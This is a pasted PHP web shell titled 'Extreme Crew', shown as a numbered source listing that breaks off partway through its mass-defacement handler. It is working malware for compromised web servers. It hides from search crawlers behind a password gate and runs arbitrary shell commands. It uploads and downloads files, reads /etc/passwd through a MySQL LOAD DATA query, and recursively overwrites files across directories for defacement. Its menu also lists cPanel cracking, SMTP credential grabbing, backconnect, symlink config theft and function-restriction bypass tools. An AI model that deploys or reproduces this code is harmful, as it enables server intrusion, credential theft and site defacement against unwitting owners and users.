· 9 years ago · Nov 25, 2016, 08:30 AM
1<?php
2$auth_pass = "2ed348e96478fc3e4b88bcfb1882f684"; // default: 3xcr3w
3session_start();
4error_reporting(0);
5set_time_limit(0);
6@set_magic_quotes_runtime(0);
7@clearstatcache();
8@ini_set('error_log',NULL);
9@ini_set('log_errors',0);
10@ini_set('max_execution_time',0);
11@ini_set('output_buffering',0);
12@ini_set('display_errors', 0);
13
14if(isset($_GET['cr0tz'])){
15$color = "#00ff00";
16$default_action = 'FilesMan';
17$default_use_ajax = true;
18$default_charset = 'UTF-8';
19if(!empty($_SERVER['HTTP_USER_AGENT'])) {
20 $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
21 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
22 header('HTTP/1.0 404 Not Found');
23 exit;
24 }
25}
26
27function login_shell() {
28?>
29<html>
30<head>
31<title>Extreme Crew</title>
32<style type="text/css">
33html {
34 background: #000000;
35 color: green;
36}
37header {
38 color: green;
39 margin: 10px auto;
40}
41input[type=password] {
42 width: 250px;
43 height: 25px;
44 color: red;
45 background: #000000;
46 border: 1px dotted green;
47 padding: 5px;
48 margin-left: 20px;
49 text-align: center;
50}
51</style>
52</head>
53<header>
54 <pre>
55 ___________________________
56 < Fill the form with ur code :D >
57 ---------------------------
58 _ _ _____ _ _____ _____ _ _
59 _| || |_ |____ | | | / __ \ |____ | _| || |_
60|_ __ _| / /__ __| |_ _ __ ___ _ __ ___ ___ | / \/ _ __ / /__ __ |_ __ _|
61 _| || |_ \ \\ \/ /| __|| '__|/ _ \| '_ ` _ \ / _ \ | | | '__| \ \\ \ /\ / / _| || |_
62|_ __ _| .___/ / > < | |_ | | | __/| | | | | || __/ | \__/\| | .___/ / \ V V / |_ __ _|
63 |_||_| \____/ /_/\_\ \__||_| \___||_| |_| |_| \___| \____/|_| \____/ \_/\_/ |_||_|
64
65
66 </pre>
67</header>
68<form method="post">
69 <input type="password" name="pass">
70</form>
71<?php
72exit;
73}
74if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
75 if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
76 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
77 else
78 login_shell();
79
80if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
81 @ob_clean();
82 $file = $_GET['file'];
83 header('Content-Description: File Transfer');
84 header('Content-Type: application/octet-stream');
85 header('Content-Disposition: attachment; filename="'.basename($file).'"');
86 header('Expires: 0');
87 header('Cache-Control: must-revalidate');
88 header('Pragma: public');
89 header('Content-Length: ' . filesize($file));
90 readfile($file);
91 exit;
92}
93?>
94<html>
95<head>
96<title>Extreme Crew</title>
97<meta name='author' content='Extreme Crew'>
98<meta charset="UTF-8">
99<style type='text/css'>
100html {
101 background: #000000;
102 font-family: 'Ubuntu';
103 font-size: 13px;
104 width: 100%;
105}
106li {
107 display: inline;
108}
109table, th, td {
110 border-collapse:collapse;
111 font-family: Tahoma, Geneva, sans-serif;
112 background: transparent;
113}
114.table_home, .th_home, .td_home {
115 border: 1px solid #00FFFF;
116}
117th {
118 padding: 10px;
119}
120a {
121 color: #00FFFF;
122 text-decoration: none;
123}
124a:hover {
125 color: #00FFFF;
126 text-shadow: 0pt 1pt 0.1em rgb(255, 255, 255);
127 text-decoration:none;
128}
129b {
130 color: #00FFFF;
131}
132input[type=text], input[type=password],input[type=submit] {
133 background: transparent;
134 color: #00FFFF;
135 border: 1px solid #00FFFF;
136 margin: 5px auto;
137 padding-left: 5px;
138 font-family: 'Ubuntu';
139 font-size: 13px;
140}
141textarea {
142 border: 1px solid #00FFFF;
143 width: 100%;
144 height: 400px;
145 padding-left: 5px;
146 margin: 10px auto;
147 resize: none;
148 background: transparent;
149 color: #00FFFF;
150 font-family: 'Ubuntu';
151 font-size: 13px;
152}
153select {
154 width: 152px;
155 background: #000000;
156 color: lime;
157 border: 1px solid #00FFFF;
158 margin: 5px auto;
159 padding-left: 5px;
160 font-family: 'Ubuntu';
161 font-size: 13px;
162}
163option:hover {
164 background: lime;
165 color: #000000;
166}
167*{
168 text-shadow: 0pt 0pt 0.3em rgb(153, 153, 153);
169 font-size:11px;
170 font-family:Tahoma,Verdana,Arial;
171 color:#00FFFF;
172}
173.mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #00FFFF; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #00FFFF;-moz-box-shadow: 0px 4px 2px #00FFFF;}
174.cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #00FFFF;font-size:25px;text-shadow: 5px 5px 5px black;}
175.infoweb {
176 border-right: 1px solid #00FFFF;
177}
178a:hover{
179 text-decoration:none;
180}
181div #menu li:hover {cursor:pointer;
182}
183div#menu ul {
184 margin:1px 1px 1px 1px;padding:0;float:left;
185}
186div#menu li {
187 position:relative;display:block;float:left;
188}
189div#menu li:hover>ul {
190 left:0px;
191}
192div#menu a{
193 margin:1px 1px 1px 1px;padding:0;float:left;-moz-border-radius: 6px; border-radius: 12px; border:1px solid #00FFFF;display:block;float:left;padding:4px 6px;margin:0 6px 0 0;text-decoration:none;letter-spacing:3px;color:#00FFFF;
194}
195div#menu a:hover{
196 text-shadow: 0pt 1pt 0.1em rgb(255, 255, 255);
197 text-decoration:none;
198}
199div#menu ul ul {
200 margin:2px 1px 1px 1px;float:left;position:absolute;top:20px;left:-990em;width:140px;padding:5px 0 5px 0;background:none;
201}
202div#menu ul ul a {
203 margin-top:1px;padding:1px 1px 1px 1px;height:20px;float:none;display:block;color:#00FFFF;
204}
205.output {
206 margin:auto;border:2px solid #00FFFF;width:100%;height:400px;background:none;padding:0 2px;
207 }
208.cmdbox {
209 width:100%;
210}
211</style>
212</head>
213<?php
214
215function w($dir,$perm) {
216 if(!is_writable($dir)) {
217 return "<font color=red>".$perm."</font>";
218 } else {
219 return "<font color=lime>".$perm."</font>";
220 }
221}
222function r($dir,$perm) {
223 if(!is_readable($dir)) {
224 return "<font color=red>".$perm."</font>";
225 } else {
226 return "<font color=lime>".$perm."</font>";
227 }
228}
229function exe($cmd) {
230 if(function_exists('system')) {
231 @ob_start();
232 @system($cmd);
233 $buff = @ob_get_contents();
234 @ob_end_clean();
235 return $buff;
236 } elseif(function_exists('exec')) {
237 @exec($cmd,$results);
238 $buff = "";
239 foreach($results as $result) {
240 $buff .= $result;
241 } return $buff;
242 } elseif(function_exists('passthru')) {
243 @ob_start();
244 @passthru($cmd);
245 $buff = @ob_get_contents();
246 @ob_end_clean();
247 return $buff;
248 } elseif(function_exists('shell_exec')) {
249 $buff = @shell_exec($cmd);
250 return $buff;
251 }
252}
253function perms($file){
254 $perms = fileperms($file);
255 if (($perms & 0xC000) == 0xC000) {
256 // Socket
257 $info = 's';
258 } elseif (($perms & 0xA000) == 0xA000) {
259 // Symbolic Link
260 $info = 'l';
261 } elseif (($perms & 0x8000) == 0x8000) {
262 // Regular
263 $info = '-';
264 } elseif (($perms & 0x6000) == 0x6000) {
265 // Block special
266 $info = 'b';
267 } elseif (($perms & 0x4000) == 0x4000) {
268 // Directory
269 $info = 'd';
270 } elseif (($perms & 0x2000) == 0x2000) {
271 // Character special
272 $info = 'c';
273 } elseif (($perms & 0x1000) == 0x1000) {
274 // FIFO pipe
275 $info = 'p';
276 } else {
277 // Unknown
278 $info = 'u';
279 }
280 // Owner
281 $info .= (($perms & 0x0100) ? 'r' : '-');
282 $info .= (($perms & 0x0080) ? 'w' : '-');
283 $info .= (($perms & 0x0040) ?
284 (($perms & 0x0800) ? 's' : 'x' ) :
285 (($perms & 0x0800) ? 'S' : '-'));
286 // Group
287 $info .= (($perms & 0x0020) ? 'r' : '-');
288 $info .= (($perms & 0x0010) ? 'w' : '-');
289 $info .= (($perms & 0x0008) ?
290 (($perms & 0x0400) ? 's' : 'x' ) :
291 (($perms & 0x0400) ? 'S' : '-'));
292 // World
293 $info .= (($perms & 0x0004) ? 'r' : '-');
294 $info .= (($perms & 0x0002) ? 'w' : '-');
295 $info .= (($perms & 0x0001) ?
296 (($perms & 0x0200) ? 't' : 'x' ) :
297 (($perms & 0x0200) ? 'T' : '-'));
298 return $info;
299}
300function hdd($s) {
301 if($s >= 1073741824)
302 return sprintf('%1.2f',$s / 1073741824 ).' GB';
303 elseif($s >= 1048576)
304 return sprintf('%1.2f',$s / 1048576 ) .' MB';
305 elseif($s >= 1024)
306 return sprintf('%1.2f',$s / 1024 ) .' KB';
307 else
308 return $s .' B';
309}
310function ambilKata($param, $kata1, $kata2){
311 if(strpos($param, $kata1) === FALSE) return FALSE;
312 if(strpos($param, $kata2) === FALSE) return FALSE;
313 $start = strpos($param, $kata1) + strlen($kata1);
314 $end = strpos($param, $kata2, $start);
315 $return = substr($param, $start, $end - $start);
316 return $return;
317}
318function getsource($url) {
319 $curl = curl_init($url);
320 curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
321 curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
322 curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
323 curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
324 $content = curl_exec($curl);
325 curl_close($curl);
326 return $content;
327}
328function bing($dork) {
329 $npage = 1;
330 $npages = 30000;
331 $allLinks = array();
332 $lll = array();
333 while($npage <= $npages) {
334 $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
335 if($x) {
336 preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
337 foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
338 $npage = $npage + 10;
339 if (preg_match("(first=" . $npage . "&)siU", $x, $linksuiv) == 0) break;
340 } else break;
341 }
342 $URLs = array();
343 foreach($allLinks as $url){
344 $exp = explode("/", $url);
345 $URLs[] = $exp[2];
346 }
347 $array = array_filter($URLs);
348 $array = array_unique($array);
349 $sss = count(array_unique($array));
350 foreach($array as $domain) {
351 echo $domain."\n";
352 }
353}
354function reverse($url) {
355 $ch = curl_init("http://domains.yougetsignal.com/domains.php");
356 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
357 curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
358 curl_setopt($ch, CURLOPT_HEADER, 0);
359 curl_setopt($ch, CURLOPT_POST, 1);
360 $resp = curl_exec($ch);
361 $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
362 $array = explode(",,", $resp);
363 unset($array[0]);
364 foreach($array as $lnk) {
365 $lnk = "http://$lnk";
366 $lnk = str_replace(",", "", $lnk);
367 echo $lnk."\n";
368 ob_flush();
369 flush();
370 }
371 curl_close($ch);
372}
373if(get_magic_quotes_gpc()) {
374 function ec_ss($array) {
375 return is_array($array) ? array_map('ec_ss', $array) : stripslashes($array);
376 }
377 $_POST = ec_ss($_POST);
378 $_COOKIE = ec_ss($_COOKIE);
379}
380
381if(isset($_GET['folder'])) {
382 $dir = $_GET['folder'];
383 chdir($dir);
384} else {
385 $dir = getcwd();
386}
387$kernel = php_uname();
388$ip = gethostbyname($_SERVER['HTTP_HOST']);
389$dir = str_replace("\\","/",$dir);
390$scdir = explode("/", $dir);
391$freespace = hdd(disk_free_space("/"));
392$total = hdd(disk_total_space("/"));
393$used = $total - $freespace;
394$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
395$ds = @ini_get("disable_functions");
396$mysql = (function_exists('mysql_connect')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
397$curl = (function_exists('curl_version')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
398$wget = (exe('wget --help')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
399$perl = (exe('perl --help')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
400$python = (exe('python --help')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
401$show_ds = (!empty($ds)) ? "<font style='color:red'>$ds</font>" : "<font style='color:lime'>ON</font>";
402if(!function_exists('posix_getegid')) {
403 $user = @get_current_user();
404 $uid = @getmyuid();
405 $gid = @getmygid();
406 $group = "?";
407} else {
408 $uid = @posix_getpwuid(posix_geteuid());
409 $gid = @posix_getgrgid(posix_getegid());
410 $user = $uid['name'];
411 $uid = $uid['uid'];
412 $group = $gid['name'];
413 $gid = $gid['gid'];
414}
415echo "<table>";
416echo "<td class=infoweb>";
417echo "System: <font color=lime>".$kernel."</font><br>";
418echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
419echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
420echo "Safe Mode: $sm<br>";
421echo "Disable Functions: $show_ds<br>";
422echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
423echo "Current DIR: ";
424foreach($scdir as $c_dir => $cdir) {
425 echo "<a href='?cr0tz&folder=";
426 for($i = 0; $i <= $c_dir; $i++) {
427 echo $scdir[$i];
428 if($i != $c_dir) {
429 echo "/";
430 }
431 }
432 echo "'>$cdir</a>/";
433}
434echo " [ ".w($dir, perms($dir))." ]";
435echo "</td><td style='width:20%'>";
436echo " Server IP: <font color=lime>".$ip."</font><br> Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font>";
437echo "<br><br>";
438echo " <a href='?cr0tz' style='border:1px solid #00FFFF;font:12px ;width:200px;padding:0px 20px 0px 20px;'>H O M E</a> <a href='?cr0tz&do=kill' style='border:1px solid #00FFFF;width:200px;padding:0px 20px 0px 20px;'>K I L L </a> <a href='?cr0tz&logout=true' style='color:red;border:1px solid #00FFFF;width:200px;padding:0px 20px 0px 20px;'>L O G O U T</a>";
439echo "</td></table>";
440echo "<hr>";
441echo "
442<table>
443<tr>
444<div id='menu'>
445 <ul class=menu>
446 <li><a href='?cr0tz&folder=$dir'>Filesman</a></li>
447 <li><a href='?cr0tz&folder=$dir&do=cmd'>Command</a></li>
448 <li><a href='?cr0tz&folder=$dir&do=jumping'>Jumper</a></li>
449 <li><a>Symlink</a>
450 <ul>
451 <li><a href='?cr0tz&folder=$dir&do=config' style='background-color:black'> Config</a></li>
452 <li><a href='?cr0tz&folder=$dir&do=convh' style='background-color:black'> Config vhosts</a></li>
453 <li><a href='?cr0tz&folder=$dir&do=symser' style='background-color:black'> Symlink Server</a></li>
454 </ul>
455 </li>
456 <li><a>Mass</a>
457 <ul>
458 <li><a href='?cr0tz&folder=$dir&do=mass_deface' style='background:black'> Mass Deface</a></li>
459 <li><a href='?cr0tz&folder=$dir&do=mass_helper' style='background:black'> Mass Helper</a></li>
460 </ul>
461 </li>
462 <li><a href='?cr0tz&folder=$dir&do=domains'>Domains</a></li>
463 <li><a href='?cr0tz&folder=$dir&do=upload'>Uploader</a></li>
464 <li><a>Tools</a>
465 <ul>
466 <li><a href='?cr0tz&folder=$dir&do=zoneh' style='background-color:black'> Zone-H</a></li>
467 <li><a href='?cr0tz&folder=$dir&do=network' style='background-color:black'> Backconnect</a></li>
468 <li><a href='?cr0tz&folder=$dir&do=mysql' style='background-color:black'> Mysql Interface</a></li>
469 <li><a href='?cr0tz&folder=$dir&do=adminer' style='background-color:black'> Adminer</a></li>
470 </ul>
471 </li>
472 <li><a>Grab/Crack</a>
473 <ul>
474 <li><a href='?cr0tz&folder=$dir&do=cpanel' style='background-color:black'> Cpanel Cracker</a></li>
475 <li><a href='?cr0tz&folder=$dir&do=smtp' style='background-color:black'> SMTP Grabber</a></li>
476 </ul>
477 </li>
478 <li><a>Bypass</a>
479 <ul>
480 <li><a href='?cr0tz&folder=$dir&do=etcpler' style='background-color:black'> etc/passw</a></li>
481 <li><a href='?cr0tz&folder=$dir&do=bypass' style='background-color:black'> Disable Functions</a></li>
482 </ul>
483 </li>
484 <li><a href='?cr0tz&folder=$dir&do=boom'>Ngindex</a></li>
485 </ul>
486 </div></tr><br><br>";
487 echo "<hr>";
488 echo "<table>";
489if($_GET['logout'] == true) {
490 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
491 echo "<script>window.location='?';</script>";
492} elseif($_GET['do'] == 'upload') {
493 echo "<center>";
494 if($_POST['upload']) {
495 if($_POST['tipe_upload'] == 'biasa') {
496 if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
497 $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
498 } else {
499 $act = "<font color=red>failed to upload file</font>";
500 }
501 } else {
502 $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
503 $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
504 if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
505 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
506 $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
507 } else {
508 $act = "<font color=red>failed to upload file</font>";
509 }
510 } else {
511 $act = "<font color=red>failed to upload file</font>";
512 }
513 }
514 }
515 echo "Upload File:
516 <form method='post' enctype='multipart/form-data'>
517 <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
518 <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
519 <input type='file' name='ix_file'>
520 <input type='submit' value='upload' name='upload'>
521 </form>";
522 echo $act;
523 echo "</center>";
524} elseif($_GET['do'] == 'kill') {
525 if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
526 die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
527 else
528 echo '<center>unlink failed!</center>';
529} elseif($_GET['do'] == 'mysql'){if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){$sqlhost = $_GET['sqlhost'];$sqluser = $_GET['sqluser'];$sqlpass = $_GET['sqlpass'];$sqlport = $_GET['sqlport'];if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){$msg .= "<div style='width:99%;padding:4px 10px 0 10px;'>";$msg .= "<p>Connected to ".$sqluser."<span class='gaya'>@</span>".$sqlhost.":".$sqlport;$msg .= " <span class='gaya'>-></span> <a href='?cr0tz&folder=".$dir."&do=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&'>[ databases ]</a>";if(isset($_GET['db'])) $msg .= " <span class='gaya'>-></span> <a href='?cr0tz&folder=".$dir."&do=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."'>".htmlspecialchars($_GET['db'])."</a>";if(isset($_GET['table'])) $msg .= " <span class='gaya'>-></span> <a href='?cr0tz&folder=".$dir."&do=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."&table=".$_GET['table']."'>".htmlspecialchars($_GET['table'])."</a>";$msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";$msg .= "</div>";echo $msg;if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){$db = $_GET['db'];$query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE '/etc/passwd'\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'><input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>$query</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";$tables = array();$msg .= "<table class='explore' style='width:99%;'><tr><th>available tables on ".$db."</th></tr>";$hasil = @mysql_list_tables($db,$con);
530while(list($table) = @mysql_fetch_row($hasil)){@array_push($tables,$table);} @sort($tables);
531foreach($tables as $table){$msg .= "<tr><td><a href='?cr0tz&folder=".$dir."&do=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."'>$table</a></td></tr>";} $msg .= "</table>";}
532elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){
533$db = $_GET['db'];$table = $_GET['table'];$query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";$msgq = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";$columns = array();$msg = "<table class='explore' style='width:99%;'>";$hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);while(list($column) = @mysql_fetch_row($hasil)){$msg .= "<th>$column</th>";$kolum = $column;}$msg .= "</tr>";$hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
534list($total) = mysql_fetch_row($hasil);
535if(isset($_GET['z'])) $page = (int) $_GET['z'];
536else $page = 1;$pagenum = 100;$totpage = ceil($total / $pagenum);$start = (($page - 1) * $pagenum);$hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
537while($datas = @mysql_fetch_assoc($hasil)){$msg .= "<tr>";foreach($datas as $data){if(trim($data) == "")
538$data = " ";$msg .= "<td>$data</td>";}$msg .= "</tr>";} $msg .= "</table>";$head = "<div style='padding:10px 0 0 6px;'> <form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> Page <select class='inputz' name='z' onchange='this.form.submit();'>";
539for($i = 1;$i <= $totpage;$i++){$head .= "<option value='".$i."'>".$i."</option>";
540if($i == $_GET['z']) $head .= "<option value='".$i."' selected='selected'>".$i."</option>";} $head .= "</select><noscript><input class='inputzbut' type='submit' value='Go !' /></noscript></form></div>";$msg = $msgq.$head.$msg;}
541elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){$db = $_GET['db'];$query = magicboom($_GET['sqlquery']);
542$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";@mysql_select_db($db);$querys = explode(";",$query);foreach($querys as $query){if(trim($query) != ""){$hasil = mysql_query($query);
543if($hasil){$msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query."; <span class='gaya'>[</span> ok <span class='gaya'>]</span></p>";$msg .= "<table class='explore' style='width:99%;'><tr>";
544for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";$msg .= "</tr>";for($i=0;$i<@mysql_num_rows($hasil);$i++) {$rows=@mysql_fetch_array($hasil);$msg .= "<tr>";for($j=0;$j<@mysql_num_fields($hasil);$j++) {
545if($rows[$j] == "") $dataz = " ";
546else $dataz = $rows[$j];$msg .= "<td>".$dataz."</td>";} $msg .= "</tr>";} $msg .= "</table>";}
547else $msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query."; <span class='gaya'>[</span> error <span class='gaya'>]</span></p>";} } }
548else {$query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;";$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /><input type='hidden' name='x' value='mysql' /><input type='hidden' name='sqlhost' value='".$sqlhost."' /><input type='hidden' name='sqluser' value='".$sqluser."' /><input type='hidden' name='sqlport' value='".$sqlport."' /><input type='hidden' name='sqlpass' value='".$sqlpass."' /><input type='hidden' name='db' value='".$db."' /><p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p><p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p></form></div> ";$dbs = array();$msg .= "<table class='explore' style='width:99%;'><tr><th>available databases</th></tr>";$hasil = @mysql_list_dbs($con);
549while(list($db) = @mysql_fetch_row($hasil)){@array_push($dbs,$db);} @sort($dbs);foreach($dbs as $db){
550$msg .= "<tr><td><a href='?cr0tz&folder=".$dir."&do=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."'>$db</a></td></tr>";} $msg .= "</table>";}
551@mysql_close($con);} else $msg = "<p style='text-align:center;'>can't connect</p>";echo $msg;} else{?>
552<br><center><h2 class="cgx2">MySQL Connect</h2><form action="?" method="get"><input type="hidden" name="y" value="<?php echo $dir;?>" /> <input type="hidden" name="x" value="mysql" /><table class="tabnet" style="width:300px;" align="center"> <tr><th colspan="2">Connection Form</th></tr> <tr><td> Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td> Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td> Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td> Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr></table></form></center>
553<?php }}
554 elseif($_GET['do'] == 'cmd') {?>
555<form action="?cr0tz&act=<?php echo $dir;?>&do=cmd" method="post"> <table class="cmdbox"> <tr><td colspan="2">
556<textarea class="output" readonly>
557<?php if(isset($_POST['submitcmd'])) {echo @exe($_POST['cmd']);} ?>
558</textarea> <tr><td colspan="2"><?php echo "$user >";?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Do !" name="submitcmd" style="width:12%;" /></td></tr> </table></form>
559<?php } elseif($_GET['do'] == 'mass_deface') {
560 function sabun_massal($dir,$namafile,$isi_script) {
561 if(is_writable($dir)) {
562 $dira = scandir($dir);
563 foreach($dira as $dirb) {
564 $dirc = "$dir/$dirb";
565 $lokasi = $dirc.'/'.$namafile;
566 if($dirb === '.') {
567 file_put_contents($lokasi, $isi_script);
568 } elseif($dirb === '..') {
569 file_put_contents($lokasi, $isi_script);
570 } else {
571 if(is_dir($dirc)) {
572 if(is_writable($dirc)) {
573 echo "[<font color=lime>DONE</font>] $lokasi<br>";
574 file_put_contents($lokasi, $isi_script);
575 $idx = sabun_massal($dirc,$namafile,$isi_script);
576 }
577 }
578 }
579 }
580 }
581 }
582 function sabun_biasa($dir,$namafile,$isi_script) {
583 if(is_writable($dir)) {
584 $dira = scandir($dir);
585 foreach($dira as $dirb) {
586 $dirc = "$dir/$dirb";
587 $lokasi = $dirc.'/'.$namafile;
588 if($dirb === '.') {
589 file_put_contents($lokasi, $isi_script);
590 } elseif($dirb === '..') {
591 file_put_contents($lokasi, $isi_script);
592 } else {
593 if(is_dir($dirc)) {
594 if(is_writable($dirc)) {
595 echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
596 file_put_contents($lokasi, $isi_script);
597 }
598 }
599 }
600 }
601 }
602 }
603 if($_POST['start']) {
604 if($_POST['tipe_sabun'] == 'mahal') {
605 echo "<div style='margin: 5px auto; padding: 5px'>";
606 sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
607 echo "</div>";
608 } elseif($_POST['tipe_sabun'] == 'murah') {
609 echo "<div style='margin: 5px auto; padding: 5px'>";
610 sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
611 echo "</div>";
